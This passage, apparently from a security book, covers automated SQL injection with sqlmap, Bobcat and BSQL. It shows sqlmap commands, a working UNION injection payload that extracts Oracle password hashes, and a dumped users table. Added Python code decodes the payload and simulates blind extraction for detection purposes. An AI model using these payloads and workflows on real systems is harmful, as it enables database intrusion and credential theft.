Exploiting SQL Injection : Automating SQL Injection Exploitation

In the previous sections, you saw a number of different attacks and techniques that you can use once you have found a vulnerable application. However, you might have noticed that most of these attacks require a large number of requests to extract a decent amount of information from the remote database. Depending on the situation, you might need dozens of requests to properly fingerprint the remote DBMS, and maybe hundreds (or even thousands) to retrieve all the data you are interested in. Manually crafting such a vast number of requests would be extremely tedious, but fear not: several tools can automate the whole process, allowing you to relax while watching the tables being populated on your screen.


Sqlmap is an open source command-line automatic SQL injection tool that was released under the terms of the GNU GPLv2 license by Bernardo Damele A. G. and Daniele Bellucci and can be downloaded at

Sqlmap is not only an exploitation tool, but can also assist you in finding vulnerable injection points. Once it detects one or more SQL injections on the target host, you can choose among a variety of options:

  • Perform an extensive back-end DBMS fingerprint.

  • Retrieve the DBMS session user and database.

  • Enumerate users, password hashes, privileges, and databases.

  • Dump the entire DBMS table/columns or the user's specific DBMS table/columns.

  • Run custom SQL statements.

  • Read arbitrary files, and more.

Sqlmap is developed in Python, which makes the tool independent of the underlying operating system: it only requires a Python interpreter of version 2.4 or later. To make things even easier, many GNU/Linux distributions ship with the Python interpreter package installed, and on Windows, UNIX, and Mac OS X it is either already provided or freely available. Sqlmap is a command-line tool, although at the time of this writing a graphical interface is reported to be in development. Sqlmap implements three techniques to exploit an SQL injection vulnerability:

  • UNION query SQL injection, both when the application returns all rows in a single response and when it returns only one row at a time.

  • Stacked query support.

  • Inferential SQL injection. The tool compares each HTTP response with the response to the original request, using either a hash of the HTML page content or string matching, and from that true/false outcome determines the output value of the statement character by character. The bisection algorithm sqlmap implements for this technique can fetch each output character with at most seven HTTP requests. This is sqlmap's default SQL injection technique.

Sqlmap is a very powerful and flexible tool, and currently supports the following databases:

  • MySQL

  • Oracle

  • PostgreSQL

  • Microsoft SQL Server

As its input, sqlmap accepts a single target URL, a list of targets from the log files of Burp or WebScarab, or a “Google dork” which queries the Google search engine and parses its results page. Sqlmap can automatically test all the provided GET/POST parameters, the HTTP cookies, and the HTTP User-Agent header values; alternatively, you can override this behavior and specify the parameters that need to be tested. Sqlmap also supports multithreading to speed up blind SQL injection algorithms; it estimates the time needed to complete an attack depending on the speed of the performed requests, and allows you to save the current session and resume it later. It also integrates with other security-related open source projects, such as Metasploit and w3af.

Sqlmap Example

In the first example, we will retrieve the hash of the SYS user password on an Oracle XE target, by exploiting a UNION query SQL injection vulnerability. We provide the necessary parameters through the command line, but sqlmap also allows the user to specify the same options through a configuration file. Once launched, sqlmap informs the user of the actions that are being performed and of their result. In this example, sqlmap first tests the id parameter, trying several attack vectors and checking the right number of parentheses that are needed to inject successful code. Once the injection vector has been successfully constructed, sqlmap fingerprints the database, detecting an Oracle installation. Sqlmap also attempts to fingerprint the remote operating system and Web application technology, before finally focusing on the hash of the SYS password and returning it to the user.

$ python -u "" --union-use --passwords -U SYS
[hh:mm:50] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:51] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:51] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:51] [INFO] GET parameter 'id' is dynamic
[hh:mm:51] [INFO] testing sql injection on GET parameter 'id' with 0
[hh:mm:51] [INFO] testing unescaped numeric injection on GET parameter 'id'
[hh:mm:51] [INFO] GET parameter 'id' is unescaped numeric injectable with 0
[hh:mm:51] [INFO] the injectable parameter requires 0 parenthesis
[hh:mm:51] [INFO] testing MySQL
[hh:mm:51] [INFO] testing Oracle
[hh:mm:51] [INFO] the back-end DBMS is Oracle
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
[hh:mm:51] [INFO] fetching database users password hashes
[hh:mm:51] [INFO] query: UNION ALL SELECT NULL,
CHR(86)||CHR(113)||CHR(70)||CHR(101)||CHR(81)||CHR(77)||NVL(CAST(NAME AS
CHR(32))||CHR(103)||CHR(115)||CHR(83)||CHR(69)||CHR(107)||CHR(112), NULL
FROM SYS.USER$ WHERE NAME = CHR(83)||CHR(89)||CHR(83)-- AND 7695=7695
[hh:mm:51] [INFO] performed 3 queries in 0 seconds
database management system users password hashes:
[*] SYS [1]:
password hash: 2D5A0C491B634F1B
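The query sqlmap logged above hides its string literals in CHR() chains. As an added example (not code from the page or from sqlmap itself), the helper below decodes those chains in a logged query so the prefix/suffix markers sqlmap wraps around the extracted value become readable, and then shows how a value carrying those markers would be located in a response; the response body is constructed.

```python
import re

# Query copied from the sqlmap log above, with its wrapped lines joined back
# together; the CHR() chains encode the literals sqlmap injected.
LOGGED_QUERY = (
    "UNION ALL SELECT NULL, CHR(86)||CHR(113)||CHR(70)||CHR(101)||CHR(81)||CHR(77)"
    "||NVL(CAST(NAME AS CHR(32))||CHR(103)||CHR(115)||CHR(83)||CHR(69)||CHR(107)"
    "||CHR(112), NULL FROM SYS.USER$ WHERE NAME = CHR(83)||CHR(89)||CHR(83)"
    "-- AND 7695=7695"
)

# Constructed response body in which the injected column surfaced, wrapped
# in the decoded markers (this is what sqlmap searches the page for).
RESPONSE_BODY = (
    "<html><body><h1>Product</h1>"
    "<p>VqFeQM2D5A0C491B634F1BgsSEkp</p></body></html>"
)

# One CHR(n) or a run of them joined with the Oracle concatenation operator.
CHAIN = re.compile(r"(?:CHR\(\d+\)\|\|)*CHR\(\d+\)")

def decode_chr_chains(sql):
    """Replace each CHR(n)||CHR(m)... chain with the quoted string it builds,
    turning the obfuscated literals of a logged query into plain text."""
    def literal(match):
        codes = re.findall(r"CHR\((\d+)\)", match.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHAIN.sub(literal, sql)

def string_literals(sql):
    """Single-quoted literals of the decoded query, in order of appearance."""
    return re.findall(r"'([^']*)'", decode_chr_chains(sql))

def extract_marked_value(body, prefix, suffix):
    """Return the text between the marker pair in a response body, or None."""
    pattern = re.escape(prefix) + r"(.*?)" + re.escape(suffix)
    found = re.search(pattern, body, re.S)
    return found.group(1) if found else None
```

Decoding the query reveals the markers VqFeQM and gsSEkp and the literal SYS in the WHERE clause, which is the pattern to look for when reviewing database or application logs.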


Before moving on to another tool, here is another quick example, where sqlmap is used to dump the users table of the current database on a PostgreSQL 8.3.5 target, again exploiting a UNION query SQL injection vulnerability, this time using the -v 0 option to reduce the verbosity level to a minimum:

$ python -u "" --union-use --dump -T users -D public -v 0
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
Database: public
Table: users
[4 entries]
| id | password   | username |
| 1  | blissett   | luther   |
| 4  | nameisnull | NULL     |
| 2  | bunny      | fluffy   |
| 3  | ming       | wu       |


Bobcat is an automated SQL injection tool that is designed to aid a security consultant in taking full advantage of SQL injection vulnerabilities; you can download it at It was originally created to extend the capabilities of a tool by Cesar Cerrudo, called Data Thief.

Bobcat has numerous features that will aid in the compromise of a vulnerable application and help exploit the DBMS, such as listing linked servers and database schemas, dumping data, brute-forcing accounts, elevating privileges, and executing operating system commands. Bobcat can exploit SQL injection vulnerabilities in Web applications, independent of their language, but is dependent on SQL Server as the back-end database. It also requires a local installation of Microsoft SQL Server or Microsoft SQL Server Desktop Engine (MSDE).

The tool also uses the error-based method for exploiting SQL injection vulnerabilities, so if the remote DBMS is protected by sufficient egress filtering, exploitation is still possible. According to the author, the next version will include extended support for other databases and new features (such as the ability to exploit blind injections) and will also be open source. The most useful and unique feature of Bobcat is its ability to exploit the DBMS through the use of an OOB channel. Bobcat implements the “OPENROWSET” style of OOB channel as introduced by Chris Anley in 2002 (see; hence, it's a requirement for a local Microsoft SQL Server or MSDE installation. Figure 1 shows a screenshot of the tool.

Figure 1. Screenshot of Bobcat


Another very promising tool for Windows boxes is BSQL, developed by Ferruh Mavituna and available at Even though it was still in beta at the time of this writing, it performed extremely well according to the OWASP SQLiBENCH project, a benchmarking project of automatic SQL injectors that perform data extraction (, and therefore already deserves mention.

BSQL is released under the GPLv2, works on any Windows machine with .NET Framework 2 installed, and comes with an automated installer. It supports error-based injection and blind injection and offers the possibility of using an interesting alternative approach to time-based injection, where different timeouts are used depending on the value of the character to extract so that more than one bit can be extracted with each request. The technique, which the author dubbed “deep blind injection,” is described in detail in a paper that you can download from
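The bisection sqlmap uses for inferential injection (at most seven requests per character, described in the sqlmap section) and the multi-level timing idea behind “deep blind injection” described here, as an added simulation that is not sqlmap's or BSQL's code. It runs entirely against a constructed local secret, with each oracle call standing for one HTTP request, and counts the requests each channel needs: the volume a rate- or timing-based detection rule has to be tuned to.

```python
# Constructed secret standing in for a value the simulated DBMS would yield
# (such as the password hash shown earlier); nothing here touches a network.
SECRET = "2D5A0C491B634F1B"
STEP = 2.0  # seconds of artificial delay per level in the timing channel

def boolean_oracle(position, threshold):
    """Simulated true/false channel: is the ASCII code of the character at
    `position` greater than `threshold`? One call stands for one request."""
    return ord(SECRET[position]) > threshold

def bisect_char(position, oracle=boolean_oracle):
    """Binary search over the 7-bit range 0..127. The interval halves exactly
    each round, so every character costs exactly seven oracle calls."""
    lo, hi, requests = 0, 127, 0
    while lo < hi:
        mid = (lo + hi) // 2
        requests += 1
        if oracle(position, mid):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo), requests

def timing_oracle(position, shift, bits):
    """Simulated multi-level timing channel: the server would delay STEP * k
    seconds, k being the `bits`-wide slice of the character code starting at
    bit `shift`. Returns the delay that would be observed (no real sleep)."""
    k = (ord(SECRET[position]) >> shift) & ((1 << bits) - 1)
    return STEP * k

def deep_blind_char(position, bits, oracle=timing_oracle):
    """Recover one character `bits` bits per request. bits=1 is the ordinary
    one-bit timing channel; bits=2 needs four requests per character."""
    code, requests = 0, 0
    for shift in range(0, 7, bits):
        requests += 1
        code |= int(round(oracle(position, shift, bits) / STEP)) << shift
    return chr(code & 0x7F), requests

def extract(length, per_char):
    """Apply a per-character extractor to the whole value; returns
    (recovered value, total simulated requests)."""
    value, total = "", 0
    for i in range(length):
        ch, n = per_char(i)
        value, total = value + ch, total + n
    return value, total
```

For the 16-character value above, the bisection channel needs 112 requests while a two-bit timing channel needs 64, which is why a detector keyed on request rate alone sees the timing variant later.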

BSQL can find SQL injection vulnerabilities and extract information from the following databases:

  • Oracle

  • SQL Server

  • MySQL

Figure 2 shows an example screenshot of an ongoing BSQL attack.

Figure 2. BSQL during an Active Session

BSQL is multithreaded and is very easy to configure, thanks to a wizard that you can start by clicking the Injection Wizard button on the main window. The wizard will ask you to enter the target URL and the parameters to include in the request, and then will perform a series of tests, looking for vulnerabilities in the parameters that have been marked for testing. If a vulnerable parameter is found, you will be informed, and the actual extraction attack will start. By clicking the Extracted Database tab, you can see the data as it is being extracted, as shown in Figure 3.

Figure 3. BSQL Extracting the Tables and Columns of the Remote Database

Other Tools

You've been given a brief overview of three tools that can assist you in performing an efficient data extraction, but keep in mind that several other tools out there can do a very good job too. Among the most popular are the following:
